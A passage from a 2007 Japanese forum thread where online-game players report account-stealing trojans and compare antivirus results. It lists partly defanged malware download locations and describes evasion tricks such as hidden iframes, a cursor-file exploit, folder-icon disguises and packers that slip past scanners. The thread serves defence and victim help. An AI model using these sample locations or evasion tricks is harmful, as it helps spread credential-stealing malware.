・中韓台をブロックする設定にして
・パスワード変更する
これ、かなり無理があると思う。

後>874も言ってるが、これ以上はセキュスレでやったほうがいいと思う。

882 ：(^ー^*)ノ〜さん ： 2007/04/22(日) 19:00 ID:mz86ZK1R0

ROM776のお絵かき掲示板についに投稿者のHNと絵を使ったハクサイト宣伝するヤツが来た
警告あげ

883 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 20:00 ID:hcVEN26q0

【　　アドレス 　 】 http://www■biglobe-ne■com/bbs
【気付いた日時】 2007/4/22 19:41
【　 　　 OS　 　 】 Window XP MCE
【使用ブラウザ 】 Sleipnir2.5.10
【WindowsUpdateの有無】 4/20
【　アンチウイルスソフト 】 NortonInternetSecurity2007
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】 無し
【スレログやテンプレを読んだか】 Yes

ロードオブザオンラインWikiで踏みました。
メニューバーのリンクが垢ハックのアドレスの物に書き換えられてました。
今日偶々>>842のに引っかかりかけて、このスレッドに来てHostsを変更していた為被害はありませんでした。
　
■メニューバーの変更履歴
ttp://lotro.netoge.net/wiki/index.php?cmd=diff&page=MenuBar

884 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 21:07 ID:7+jCZolx0

>880
「# Trojan trap sites から # End of trojan trap sitesだけを記載してるファイル」と
言ってるから、>876が考えてるwgetとcopyを使った自動更新って、こんな感じだろう。

※wget：コマンドラインで動くダウンロードツールでIriaやIrvineのようなもの。
　　　　　指定したURLからhtmlやファイルをDL出来る。
　　　　　元はUnix系のものだが、Windows版もある。

(1)自分用のhosts(例：MyHosts.TXT)を用意し、独自設定があればそれに記入
　(独自設定が無ければOS標準のものそのままで良い)
(2)wgetで設定済みのhosts(例：DangerHosts.TXT)をDLする
　（中身は127.0.0.1　hogehoge.comみたいな形）　
(3)COPY MyHosts.TXT+DangerHosts.TXT　%SystemRoot%\System32\Drivers\etc\hosts

(2)と(3)の部分を書いたバッチファイルをスタートアップに入れるなりタスク設定
するなりしておけば、自動更新が出来る。
万が一他のトロイがhostsを改変したとしても、この形なら常に作り直しされるので
(1)で用意したものを別フォルダに保存しておけば、かなり安全と言えそうだし
PG2の危険アドレスの自動更新と同レベルの手軽さになると思う。

885 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 21:11 ID:lwBCw9SW0

>>882
なんだかROM776狙われてるって位最近また頻繁になってきたねー。
お絵かきだけじゃなく質問＆SS板にも垢ハック系の書き込みされてる。

しかし未だにURLをほいほい踏むのって・・・危機感なさ過ぎるよorz

886 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 21:24 ID:J9p6yX5a0

数少ないRO関係サイトの中でも最大手なんだから狙われて当然

887 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 21:49 ID:nnZ81cIa0

>>884
ちょっと気が効いたセキュリティソフトは読み取り専用にしてたりするので、attribで属性いじるとかあるし。
この辺は総合対策スレに移動した方がいいんじゃないだろうか？

888 ：880 sage ： 2007/04/22(日) 21:58 ID:MyAiI/bk0

>>884
えっと、私が心配していたhostsの改ざんというのは、WEBページの方の話で、
まとめサイトの管理人さんが作ってくれたページが改ざんされた場合に、
その改ざんされたhostsをダウンロードして、ローカルのhostsを作成すると
罠サイトに直行してしまう可能性があるなと・・・

PG2のリストとかなら最悪改ざんされても、罠を踏まない限りは問題ないですが、
hostsだと頻繁に利用しそうなホスト名を登録しておけば、そのまま罠に直行してしまいますので。

自分でも、ちょっとそれは心配しすぎかなとは思ってますが、
hostsは悪用されれば危険な代物なので、念のため指摘させて頂きました。

889 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 00:09 ID:QfDW7z2C0

【　　アドレス 　 】http://www■fcty-net■com/
【気付いた日時】 4月22日19：00頃、踏んだ直後に
【　 　　 OS　 　 】 WINDOWSXP　SP2
【使用ブラウザ 】 IE6，0　SP2
【WindowsUpdateの有無】 自動更新、毎日03：00設定
【　アンチウイルスソフト 】 NortonAntiVirus2003
【その他のSecurty対策 】 Spybot S&D、ルータ
【 ウイルススキャン結果】 Nortonで完全スキャンした結果ウイルスは
見つからず。今カスペルスキーオンラインスキャンかけてます。
【スレログやテンプレを読んだか】 Yes

【説明】自分のブログに書き込まれていたコメントで踏みました。
友人の名前で書き込みされていて、友人のブログは更新されている
かなあ、と思って友人のブログを訪問しようとして気軽に踏んで
しまいました_|￣|○　飛んだ先では画像がゆっくりと表示されて
おり、画像は他MMOのスクリーンショットの様なものでした。

これはおかしいと思って、ソースチェッカーオンラインで調べたら
※このアドレスは危険URLの一つです。と出ました。
ROにログインしている状態だったので、慌ててネット接続を切断して
実家のPCからガンホーPASS、アトラクションPASSを変更しました。
今のところお金や装備は無事の様です。

画像ファイルに拡張子を偽装したウイルス感染を実行するScript等を
アップローダ等に置いて感染させる〜項目で、IE6sp2以降では インター
ネットオプション → セキュリティ → レベルのカスタマイズ → 拡張子
ではなく内容で開く をONにすれば防げると書き記されていて、見てみたら
ONになっていたので感染はしていないのでしょうか。

念のため、お金と装備の大部分を実家PCで友人に預けておきましたが
自宅からは怖くてROにログインできません……不安を解消したいなら
OSの再インストール、もしくは自己責任でこのままROを続ける、の
二択しかないのでしょうか。どうかご教授のほど、よろしくお願い
致します。

890 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 00:19 ID:WGsznVtv0

そうでぃす、二択でぃす

891 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 00:29 ID:tkq7AiXL0

＞ネットオプション → セキュリティ → レベルのカスタマイズ → 拡張子
＞ではなく内容で開く をONにすれば防げると書き記されていて、見てみたら

逆。OFFにしないと駄目。デフォルトではONになっている。

jpeg拡張子でも、中味がhtmlならhtmlで開こうとする機能。便利だけど、垢ハックのことを考えたらOFFにしよう。

892 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:21 ID:QFYHT8bK0

>>889
＞【　アンチウイルスソフト 】 NortonAntiVirus2003

気になったんだが、これは2006年10月17日で更新サービスが終了してるぞ。
半年も前に更新が終了したアンチウイルスソフトなど役に立たない。
すぐにでも新しいソフトの導入をしたほうがいい。

893 ：(^ー^*)ノ〜さん ： 2007/04/23(月) 01:22 ID:MWw/lH0W0

【　 　 　 気付いた日時　 　 　 　 　 】 ２００７／０４／２２
【不審なアドレスのクリックの有無　】 有名な取引掲示板。
【他人にID/Passを教えた事の有無】 知ってるか知らないけど、旦那だけ。
【他人が貴方のPCを使う可能性の有無】 使ってないとは思うけど、旦那。
【 　 　ツールの使用の有無　 　 　 】 ツールはすべて不正？だと思っているので使ってないです。
【　 ネットカフェの利用の有無　 　　】バリバリあり。（よくいくのは２箇所）
【　 　　 OS　 　 】 ＷｉｎｄｏｗｓＸＰ　ＰＳ２
【使用ブラウザ 】 ＩＥ６
【WindowsUpdateの有無】 ２００７／０４／２２
【　アンチウイルスソフト 】 ウイルスセキュリティ
【その他のSecurty対策 】 ルータ２台（Ｖ１１０ひかり電話・無線ルータ・ハブ）
【 ウイルススキャン結果】 いろんなソフトを使ったけど引っかからず。
【スレログやテンプレを読んだか】 読みました。
【説明】
ここに書いてあるファイル名やら、別のページにあったファイル名を手動で検索してみましたが、
１つも引っかからず。
別のＰＣでパスは変更したので、垢ハックは大丈夫だと思うのですが；
（高い装備はないけど、製造系アイテムは結構ある；）
有名な取引掲示板で誤クリックしたら、白いページしか表示されず･･･。
ただ、自動インストールにはポップアップにしてたのですが、それも起動せず。
やっぱり、ＯＳ再インストの方がいいんでしょうかー？
なにも引っかからないのに再インストしても安全？

旦那に連絡つかなくて、とっても不安すぎて寝れません。
どーしましょう；
誰か助けてほしいです；

894 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:33 ID:WGsznVtv0

とりあえずカスペオンラインスキャン
別PCから変更してるなら、踏んだPCでは一応の安全が取れるまでは何もしないでおく

895 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:34 ID:wgk3mRde0

分多PCでログインやアトラクションセンターなどの
パスワード入力する行為さえしていなければ大丈夫。
とりあえず落ち着いて対処しましょう。

896 ：893 ： 2007/04/23(月) 01:38 ID:MWw/lH0W0

レスありがとうございます〜。
いまから、カスペオンラインスキャン試してみます。

もし引っかからなかったらまた相談に来ます。

ありがとうございました〜。

897 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:39 ID:cE+W7bAO0

そんなに不安なら再インスコが一番手っ取り早いし気分的にも楽
安全ってお墨付きもらってもやっぱ不安だろ？

898 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:43 ID:7Vk2pWLQ0

垢ハックに感染した時のOS再インストールはHDDのフォーマットまでやらないと駄目なのかな
NortonGhostやAcronis True Imageの様なバックアップツールで感染前に戻す事でも解決出来るんだろうか

899 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 01:44 ID:QFYHT8bK0

>>893
その該当PCでROのIDやパスワードを入力する行為をしてなければ大丈夫。
別PCでパスワードも変更されてるようなので、まずはそのままで落ち着こう。

すでに実行されてるかもしれませんけど、もししてないようなら
以下のオンラインスキャンをしてみましょう。
・カスペルスキー：オンライン ウイルス＆スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/

これで何も見つからなくても絶対に大丈夫とは言えません。
不安なようならOS再インストールが確実。
ここの最終判断は自己責任でどうぞ。

900 ：899 sage ： 2007/04/23(月) 01:46 ID:QFYHT8bK0

リロードしろ俺orz

901 ：889 sage ： 2007/04/23(月) 01:58 ID:QfDW7z2C0

>>890〜892
すばやいレスありがとうございます、さっそく対策をとってみます。
今のところカスペルスキー先生は

見つかったウイルス：8
感染したオブジェクト：18

と仰っております（；´Д`）現在59％までスキャン完了。
とりあえず明日アンチウイルスソフト買ってこよう……。

902 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 02:03 ID:WGsznVtv0

( ﾟдﾟ)…

( ﾟдﾟ )

903 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 02:03 ID:tkq7AiXL0

ダウンロード販売という手段もありますが、感染しちゃってるＰＣで落とすよりは、
買ってきた方がいいかもね。

ＲＯへのログイン、パスワード変更などを踏んだ後１回もやらなければ大丈夫だから
ゆっくり寝てクリアな頭で対処したほうがいいよ。

904 ：893 ： 2007/04/23(月) 02:19 ID:MWw/lH0W0

皆さんやさしい人達ばかりで感謝です。
まだ半分までのスキャンですが、途中報告。

ウイルスが１つ見つかりました。
ってもまだ５０％スキャンが残ってますが･･･。
オブジェクトも１３個感染？してるっぽいので、ＯＳ再インストール＆ＨＤＤフォーマット
までしてみる予定です。

ちなみに･･･。
ＨＤＤがＣとＤで、２つに分けてる（最初から分けてあった）のですが、
Ｄディスクの中身ＣＤ−Ｒに焼いても大丈夫なのかな･･･？
ＣＧ作ったものとか入ってたので；

もしお暇だったら･･･。
決済系（銀行やらＷｅｂｍｏｎｅｙとか。）のＰａｓｓも変えてたほうがいいんでしょうかね〜？
まぁ、今残高０なんですけど；
どこまでパクるウィルスかわかんなくて困る；

905 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 02:38 ID:QseVKLBV0

>904
>決済系（銀行やらＷｅｂｍｏｎｅｙとか。）のＰａｓｓも変えてたほうがいいんでしょうかね〜？

……ROのPASSよりそっちの方が重要だろ……

906 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 04:12 ID:wYMg+Fi30

>>898
有用なのだが、そこまで気を使うユーザーが少ないのと、プログラムとデータの分離を心がけていないからだろうな。
ファイル鯖に作り込めば、PXEブート利用、一切の外部メディア不要のリカバリが可能なのだが。

>>904
とりあえず、検出結果ログが出てくるだろうから、ウィルスの名称だけでもここに書くといいよ。
それと、ネットバンクは残高が無いからと言って安心は出来ない。
資金洗浄の中継口座に利用されて、桜田門さんがお宅訪問なんて可能性だって十分にある。

907 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 08:48 ID:Ct8iu3jj0

昨日カスペルスキーを導入したのですが、
完全スキャンを行ったところ、「Trojan-Dropper.Win32.VB.kb」なるトロイがゴミ箱から発見？されたといわれました。

検索してもハングルのページが引っかかるだけなので一体どういったものなのでしょうか？
駆除は出来たと言われました。

908 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 09:10 ID:iiW0wCLC0

カペルスキーのデータベースに詳細がまだ乗ってない奴だな
正直どんな奴かわからん
感染ファイルがゴミ箱の中にあったっていうことは、そのファイルをいつ捨てたのかはわからないが、潜在的にトロイに感染してたと見てよさそう
いつから感染してたのか特定できなさそうだから駆除できたからといって安心はしない方がよさそうな気がする

909 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 10:07 ID:x54csjYh0

Dropper型は発動時にファイルを作成するタイプを指すので、亜種によって物が違うはず。

実体の方を検知出来てないなら、発動前にゴミ箱入った・駆除済み・未検出、のどれか。
垢ハックに関係するか、また無害かどうかは情報が無いので何とも。
用心だけはした方がいいかもね。

910 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 11:09 ID:KZ3HEdWx0

Downloaderならそのまま捨てだな。

911 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 12:10 ID:wgk3mRde0

公知イベントスレにアカハックURL。文的に中華じゃなさそうだが･･･

912 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 12:14 ID:KZ3HEdWx0

いや中華だと思うよ。エロSPAM等からのコピペはよくあること。

913 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 12:55 ID:GafWPkFf0

エロSPAMどころか同じ掲示板の他の記事をコピペして
後ろにURL追加 or 記事中のURLを垢ハックのモノに変更

というのもあるから困る

914 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 13:30 ID:KZ3HEdWx0

名前も他からパクったりするから始末悪いよな。

915 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 16:30 ID:BidKvYoH0

776で告知されてたけど、ついに国内のIPから垢ハックURLが貼られるようになったとか…
どんどん凶悪化が増してきてるなぁ…

916 ：(^ー^*)ノ〜さん ： 2007/04/23(月) 17:11 ID:uiBop3kD0

>883
このURL書き込みがゲーム系WIKIで氾濫している模様。
DDOWIKIの一つもメニューがかなりいじられてました。
【　　アドレス 　 】 http://www■biglobe-ne■com/bbs
【気付いた日時】 2007/4/23 15:00頃
【　 　　 OS　 　 】 Window XP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 4/20
【　アンチウイルスソフト 】 avast!
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】 無し
【スレログやテンプレを読んだか】 あるていど。

ﾌﾝﾁﾞｬｯﾀ！
…のでアドレス内を探検
キーロガー系かなぁ、と思います。
踏んじゃったのでソースをあさっていたらW u、W ｚやh a p p y1-3というページが0サイズフレームで組み込まれていました。
中身をたどるとt■exというファイルのダウソなどが入ってます。
ttp://www■biglobe-ne■com/ を覗くと文字化けしたっぽい変な文章があるので中系かな。
トレンドマイクロの新しいオンラインスキャナでダウンローダー系２種、
かすぺで一個(のっとあウィルスになってたが）が出てきた。

まあ、WIN再ｲﾝｽｺしてくるわー。

917 ：916 sage ： 2007/04/23(月) 17:11 ID:uiBop3kD0

sage忘れｽﾏｿ。

918 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 17:43 ID:XOura1jP0

うちの場末ブログのコメントにも奴らがとうとう来やがったぜ。
他の人も報告してたように、Googleで引っかけたようだ。
アクセス解析によると検索語句は「forsety鯖」。リモホは例によって福建省

>>915
愉快犯のアホな日本人がいるんじゃないかと思ってる。
アホってのはいつだって斜め上だからな。

919 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 17:52 ID:tRpaxflm0

踏んだ踏んだ騒いでる奴、なんで感染すると分かっててIEなんか使ってるんだろうな

920 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 17:59 ID:HKeslZH60

firefox信者ｋｔｋｒ

ブラウザを気にするよりアンチウィルスソフトを気にした方がいいと思うがっ

921 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 18:21 ID:GoGHrjll0

ﾌﾞﾗｳｽﾞするだけならLinuxでいいじゃね

922 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 18:38 ID:tRpaxflm0

>>920
IE信者うぜえから消えろカス

923 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 18:44 ID:knm/u6Om0

せめて「IE自体が垢ﾊｯｸなんだから自業自得ｗｗｗ」くらい突き抜けてほしいな

924 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 18:46 ID:lpuSEO7qO

面倒になったんで俺はブログのコメントトラバ拒否にしてリンクさせたteacup系掲示板にコメントさせるようにした
びっくりするくらい楽になったわ。

925 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 20:21 ID:TYNG3PaY0

て言うか、普通に危険度はIE＞Firefoxでしょ

926 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 20:47 ID:QEki8d1+0

ここじゃ何なのでセキュスレの方で存分に語ろうぜ。

普通に勧めるならともかく、高飛車な態度でバカにしに来てる時点でお察しだが。

927 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 20:52 ID:KZ3HEdWx0

>>916
interqzのt1.exe、ありふれたUpack圧縮Maran。
これを検知できないのは今時ないんじゃないかなぁ。

>>918
踏んで身包み剥がされた奴が八つ当たりしてるのかもなぁ。

928 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 21:20 ID:KZ3HEdWx0

げー…。
www■rormb■com がまた凄まじいスクリプト書いてる…。
相変わらずだなこいつ。

929 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 21:26 ID:wgk3mRde0

国内なら足つくかね？逮捕されて報道でもされてくれると認知されやすくなるが。

930 ：(^ー^*)ノ〜さん ： 2007/04/23(月) 21:54 ID:mwtLagjl0

【　　アドレス 　 】http://picopico.dip.jp/ragnarok/upload.do?actionType=1&srvGrp=3（ぴころだ）の1177257973173
【気付いた日時】 4月23日21：30頃（同ページの垢ハック注意 1177257973173を見て。踏んだのは4月23日02:00ごろ）
【　 　　 OS　 　 】 WINDOWSXPHE　SP2
【使用ブラウザ 】 IE7.0　SP2
【WindowsUpdateの有無】 自動更新
【　アンチウイルスソフト 】 NortonAntiVirus2006
【その他のSecurty対策 】 Spybot S&D、ルーター
【 ウイルススキャン結果】 Nortonで完全スキャン・カスペルスキーオンラインスキャンで反応なし。
【スレログやテンプレを読んだか】 Yes

とりあえず報告。
ウィルスもなにも検知されてないので、垢ハック注意、というのが嘘かもしれないけど、
私じゃ真偽の確認ができないので、踏んだ人、踏むかもしれない人のために報告。

931 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 21:58 ID:Edg0Os8H0

>>930
そんな提示の仕方じゃ踏んじまうじゃないか…しんでくれorz

932 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:01 ID:WGsznVtv0

掲示板へのリンクだから、直接アップされた物へのリンクでないにしても
.は■にして置いた方が良いね、テンプレ読んでるなら尚更

933 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:01 ID:ruWIUEtw0

>>930
アドレス直に張るなよ阿保・・・

934 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:06 ID:F9K3aul00

とりあえず右クリ保存からメモ帳で開き、その後ペイントで見てみてソースチェッカーにもかけたが、
特に何もないjpgだったと思う

935 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:10 ID:KZ3HEdWx0

ただの画像じゃん…。LiveRO行け。

936 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:10 ID:tkq7AiXL0

>>930
それはただの痛い発言のＳＳでした。

937 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:48 ID:KZ3HEdWx0

rormbのキチガイJavaScriptいじり終えた。
aniカーソルが変なASP経由で落ちてくる(なぜかクッキーを食べさせられる)。
カーソル指定でさらに何かをするとウイルス対策ソフトのani検知をすり抜けられるってのを
最近何かで見たので、それ狙いか? WindowsUpdateで塞いでいれば問題ないはず。

あとiframeで /onlinecount/tt.htm を呼ぶ。
こちらもキチガイJavaScriptで、これ自身が
見慣れたActiveXコントロール使うVBScriptを生成する。

938 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 22:50 ID:KZ3HEdWx0

で、aniとVBSが拾うトロイはいずれも /onlinecount/tj.exe 。
オンラインスキャナに投げたところNortonもMcAfeeもバスターもスルー。
BEP(BeRo)圧縮で正体はよくわからないけど、ドメインからしてRO狙いと思われる
(Lineage用にはlinbbsやlinrmbといったドメインを持っている)。

なおaniの中に「KASPERSKY」の文字列がいくつもある。
おそらく挑発だろう(でも検知した。神速で対応されたものと思われる)。
構造もいつものlovetw系(z1.jpgとz2.jpg)より新しい
(URIが末尾ではなく先頭のほうにある)。

939 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 23:01 ID:KZ3HEdWx0

スルー組のうち主だったところ(上記に加えてAvast!とBitDefender)に
検体発射しました。

940 ：(^ー^*)ノ〜さん sage ： 2007/04/23(月) 23:34 ID:tkq7AiXL0

>>938
調査乙。

NOD32では、その tj.exe は、Win32/PSW.Lineage.DN トロイの亜種 と検知されました。

941 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 02:32 ID:RQWq4vos0

>>937
>クッキー
検体チェック者を特定して、ip指定で遮断してくるつもりか。
はたまた、非ブラウザのアクセスを蹴る為だろうか。

942 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 07:37 ID:lCLeqSoR0

>>580 のトロイ差し替え。
www■gomeodc■com/mmkk■com (実質exe)
www■vviccd520■com/img/mmdd.exe
WinRAR自己解凍でトロイの22.exe(とエロ写真の1.jpg。18歳未満は見ちゃだめ)。
両者の違いはエロ画像のみ、トロイは同一なのでお好きなほうをどうぞ
(やたら重いというか切れるのでダウンローダ推奨。500kB以上あります)。

943 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 08:17 ID:DITBvC0M0

>>942
報告乙。両ファイルとも、NOD32ですり抜けるのを確認。検体提出行ってきます。
新手のダウンローダですね。

画像用あぷろだにでも置いて、ファイルサイズ大きいから画像だと誤認させて、踏ませるのが目的かな。

944 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 08:34 ID:lCLeqSoR0

ググったところ台湾向けなのかなぁ。
日本のサイトが引っかからない。
とりあえず地元ってことでトレンドマイクロに送った。

945 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 08:52 ID:DITBvC0M0

>>942 一部補足
WinRAR形式ではなく、ZIPの自己解凍のようですね。PEiDで圧縮形式を確認した所、
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [ZIP SFX]
となっていましたし、他の解凍ツール開いても、Deflateとなっていました。

LiveROに上がっていた検体提出先に、まとめて送信中。

946 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 09:05 ID:lCLeqSoR0

あ、すまんかった。解凍ソフトに突っ込んだのでよく見てなかった。

947 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 09:34 ID:DITBvC0M0

カスペから返答。>>942は既に検知できるらしい。

22.exe_, mmdd.exe_, mmkk.com_ - Trojan-PSW.Win32.Nilage.bjd
These files are already detected. Please update your antivirus bases.

マカフィーはmalwareとしての返答はあったけど、保留中になってるので、パターンへの反映はこれからの模様。
NOD32はすり抜けるので、対応待ち。他は対応してるものとしてないものがちらほら。（以下省略）

948 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 15:17 ID:VySuS8cj0

別PC（ROはインストールしていないPC）でrom776.comの
キャッシュページを踏んでしまったのですが、
キャッシュなら問題ないのでしょうか。
【　　アドレス 　 】 rom776■com　のキャッシュ
【踏んだ日にち】　今日の１４時ごろ？
【　 　　 OS　 　 】 windows XP
【使用ブラウザ 】 IE5以上･･だと思う
【WindowsUpdateの有無】最新のものにしてあります
【　アンチウイルスソフト 】 ウィルスバスター
【その他のSecurty対策 】 わかりません
【 ウイルススキャン結果】 まだ実行していません
【スレログやテンプレを読んだか】 YES
【説明】
ROをインストールしていない別PCで、上記アドレスのキャッシュを踏んでしまった
のですが
（YAHOOでROM776を
検索したところ、出てきたのですが、怪しいと思いキャッシュで見てみた）
キャッシュを見ただけでもウィルス感染はしてしまうのでしょうか？
また、ROをインストールしていない別PCで感染した場合でも、
ROをインストールしているほうのPCのOSを再インストールするべきなのでしょうか。
質問攻めで申し訳ありません…

949 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 17:28 ID:RQWq4vos0

>>948
所謂iframe対策としては、キャッシュ参照は全くの無意味。
オリジナルのhtmlに、機械的にヘッダを付記しているに過ぎないから。

それとは別に、そのサイト自体は、現時点で悪意らしきものは見受けられない。
どちらかというと、SEO手法か、DoubleClick的な情報収集目的の様に思われる。

950 ：(^ー^*)ノ〜さん sage ： 2007/04/24(火) 18:20 ID:SCRzM2eh0

トレンドマイクロに>>942の検体(↓)３種を送っておきました。
・www■gomeodc■com/mmkk■com
・www■vviccd520■com/img/mmdd■exe
・上記２つの中に仕込まれてる22.exe

>>938の検体(↓)は対応したらしく、バスターで検出できるようになってました。
・www■rormb■com/onlinecount/tj■exe　　(ウイルス名：TSPY_ONLINEG.ALE)

951 ：950 sage ： 2007/04/24(火) 18:26 ID:SCRzM2eh0

そういえば、mmdd.exeのアイコンがフォルダと同じ(良く見るとちょっと画が荒い)で、危うく実行するところだった。
そんな子供だましな罠もあると事前に知ってはいたけど、いざやられると意外と気付きにくいものだなあ。

952 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 01:50 ID:Fby6T6Vn0

それはウィルスでよくある手だ。
exeの前に長い空白入れて端からはみ出させとくとかもな。

953 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 02:43 ID:jFxo9NTv0

youjo .exe

954 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 05:51 ID:4oOu2ehp0

soultakerbbs■net/******(6桁数字)/
またこのドメイン+6桁数字があちこちに貼られてきてるねー。
スカッとパンヤの公式BBSにもはってあって、何人も踏んでいるもよう；；
ゾンビPCとかになってないことを祈るばかり。

一応公式意見フォームにて、該当スレの削除と安易にURL踏まないように注意勧告、
ウィルスチェック等かけるように勧告して欲しいと依頼してきた。

955 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 08:53 ID:G7xMSYSQ0

www■blog-livedoor■net/boss/
(スクリプトは略)
www■blog-livedoor■net/boss/mangame.exe
ディレクトリやスクリプトは以前からあったのに
exeを設置していなかったもの。
nPack圧縮のため対応していない物も多いと思われます。

またUpack圧縮Maranも検知しにくい物に差し替えられております。
www■jpxpie6-7net■com/web/read_cgi/svchost.exe
など、いくつか確認。

>>954
数字といえどURIの一部なのに伏せられると確認のしようもない。

956 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 09:13 ID:XyEv0Jlt0

>>955
NOD32では、Maronの亜種として検知。
カスペオンラインスキャンでファイル単体指定してみたが、２つともすり抜け。ちょっと検体提出行って来る。

957 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 09:21 ID:G7xMSYSQ0

Mar「a」nね。

958 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 09:49 ID:XyEv0Jlt0

失礼。検体提出時の検出名はちゃんとコピペしたので間違ってない筈。各社への検体提出完了しますた。
検出できるの送られた会社の担当者様ごめんなさい。

959 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 10:03 ID:XyEv0Jlt0

カスペから返答。>>956は新種のマルウェアなので次回updateで対応とのこと。
>Hello.
>New malicious software was found in the attached file.
>It's detection will be included in the next update as Trojan-PSW.Win32.Maran.cj. Thank you for your help.

960 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 11:20 ID:r5wdakhb0

>>955の検体１種(下記)をトレンドマイクロに送りました。
www■blog-livedoor■net/boss/mangame■exe

下記の検体はバスターで検出可でした。
www■jpxpie6-7net■com/web/read_cgi/svchost■exe　　（ウイルス名：TSPY_MARAN.D）

961 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 11:45 ID:MPMJ0lSm0

しかし、カスペってスゴイな…すぐに対応してくれる意気込みが。
今まで無料のAVGとか使ってたけど、本気で購入したくなる。

雑談スマヌ。

962 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 12:16 ID:gazO9zKi0

>>959
対応終わったっぽいね。オンラインスキャナで検知した。

963 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 13:13 ID:NuNrFjzm0

>>961
バスターが肝心のウィルス見逃す時点でゴミソフト決定したしな
バスター更新の封書きてたけど更新せずにカスペ導入に踏み切るわ
未知のウィルスにすら対応できるのはスゴイよ

964 ：ばすたーゆーざー sage ： 2007/04/25(水) 13:39 ID:r5wdakhb0

カスペ恐ろしく対応が速いなあ。たったの３時間で対応するとは・・・
バスターの方は検体送ったけど、返事は原則３営業日以内。
場合によっては１週間前後かかるそうな。
（パターンへの対応がじゃなく、あくまでもサポートの返事がだけどね）

ここ２ヶ月で落とした検体を見る限りは、検出力自体はまずまずだと思ってるけど・・・、
もっとがんばれ！！トレンドマイクロ。

965 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 14:23 ID:Fby6T6Vn0

バスターみたいな大手のは垢ハックだけに構ってらんないから対応遅いのはしょうがないわな。
そういった意味では規模は小さくても新出の検体にすぐ反応してくれるカスペは垢ハック特化といえるかもね。

966 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 14:31 ID:ayG8V/sa0

TrendMicroはバグ入りパターンファイルで、多数の法人ユーザーに対して惨事復旧させられたから。
それ以降、専用のテストセンターを設立したりした結果、迅速な対応には向かなくなっている。
それに、垢ハック系マルウェアは、ウィルスのような感染力を持たないトロイ型というのもあるかと。

967 ：(^ー^*)ノ〜さん ： 2007/04/25(水) 14:32 ID:UmMpkbl10

終わり際とは言えちょい下がりすぎなのであげ

968 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 14:55 ID:gazO9zKi0

>>965
